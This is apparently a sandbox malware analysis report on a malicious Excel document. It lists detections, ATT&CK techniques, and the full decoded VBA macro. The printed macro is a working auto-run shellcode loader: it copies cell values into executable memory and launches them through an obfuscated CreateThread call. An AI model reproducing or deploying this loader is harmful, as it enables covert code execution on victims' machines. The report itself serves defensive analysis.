MALICIOUS
164
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Excel document containing VBA macros, specifically triggering AutoOpen and Workbook_Open events. The VBA code attempts to allocate memory and then uses the CreateThread API to execute arbitrary code, likely a second-stage payload. This is further supported by ClamAV detections indicating a downloader.
Heuristics 5
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() Auto_Open -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() Auto_Open -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1804 bytes |
SHA-256: 6e873772df33264493d318b9e7d191aebdcb6398a57c629d1e257185eb61f286 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Function VBA_Evaluate(Input_String As String)
Application.Volatile
VBA_Evaluate = Application.Evaluate(Input_String)
End Function
Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long
#If VBA7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#End If
n = Range("A1", Range("A1").End(xlDown)).Rows.Count
ReDim Hyeyhafxp(n)
For i = 0 To n
Hyeyhafxp(i) = Range("A1").Offset(i, 0)
Next i
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Dim p1 As String, p2 As String, p3 As String, p4 As String, p5 As String
p1 = "Cr"
p2 = "ea"
p3 = "teT"
p4 = "hre"
p5 = "ad"
VBA_Evaluate (p1 & p2 & p3 & p4 & p5 & "(0, 0, " & Xlbufvetp & ", 0, 0, 0)")
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 19968 bytes |
SHA-256: 25f1e128fb3c50264e33bfe921938fdea4a971a63c2fee0ba374492b62b9bcd3 |
|||
|
Detection
ClamAV:
Doc.Downloader.Generic-6698421-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.